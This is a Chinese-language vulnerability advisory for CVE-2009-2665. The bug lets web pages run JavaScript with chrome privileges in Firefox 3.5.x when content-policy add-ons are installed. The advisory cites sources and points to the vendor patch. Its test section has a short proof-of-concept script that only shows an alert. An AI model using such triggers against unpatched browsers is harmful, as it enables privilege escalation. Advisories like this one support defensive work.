发布日期：2009-08-03
更新日期：2009-08-05

受影响系统：

Mozilla Firefox 3.5.x

不受影响系统：

Mozilla Firefox 3.5.2

描述：

---

BUGTRAQ  ID: 35928
CVE(CAN) ID: CVE-2009-2665

Firefox是Mozilla所发布的开源WEB浏览器。

如果对Firefox安装了以JavaScript实现内容策略的附加附件（如AdBlock Plus或NoScript），包含有Link: HTTP头的网页可能导致窗口的全局对象接收错误的安全wrapper。用户受骗访问了恶意网页就会导致以chrome权限执行任意JavaScript。

<*来源：Wladimir Palant
  
  链接：https://bugzilla.mozilla.org/show_bug.cgi?format=multiple&id=498897
        http://www.mozilla.org/security/announce/2009/mfsa2009-46.html
        http://secunia.com/advisories/36001/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<script type="text/javascript">
    new function ()
    {
        function foo() {}
    };

    try
    {
        document.createComment("foo");
        alert("Success");
    }
    catch (e)
    {
        alert(e);
    }
</script>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/

浏览次数：2355
严重程度：0（网友投票）